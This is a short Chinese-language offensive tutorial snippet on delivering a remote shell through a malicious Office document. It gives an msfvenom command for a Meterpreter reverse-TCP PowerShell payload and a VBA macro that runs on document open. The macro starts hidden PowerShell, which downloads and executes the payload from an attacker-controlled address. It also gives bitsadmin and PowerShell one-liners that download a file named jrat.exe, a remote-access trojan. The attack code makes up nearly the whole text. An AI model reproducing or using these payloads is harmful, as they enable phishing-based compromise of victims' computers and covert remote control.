举例:
使用msf 生成反弹shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=443 -f psh-reflection > /var/www/html/shellcode.ps1
在office宏中插入:
Sub Execute()
Dim payload
payload = “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http://10.1.1.130/shellcode.ps1’));”
Call Shell(payload, vbHide)
End Sub
Sub Auto_Open()
Execute
End Sub
Sub Workbook_Open()
Execute
End Sub
另:windows下可以使用一下两种方式下载文件:
使用bitsadmin命令下载文件到指定目录:
bitsadmin /transfer myDownLoadJob /download /priority normal “http://xxx.xxx.xxx.xxx/jrat.exe” “D:\exe.exe”
使用ps下载文件
powershell (new-object System.Net.WebClient).DownloadFile( ‘http://xxx.xxx.xxx.xxx/jrat.exe’,’D:\exe.exe’)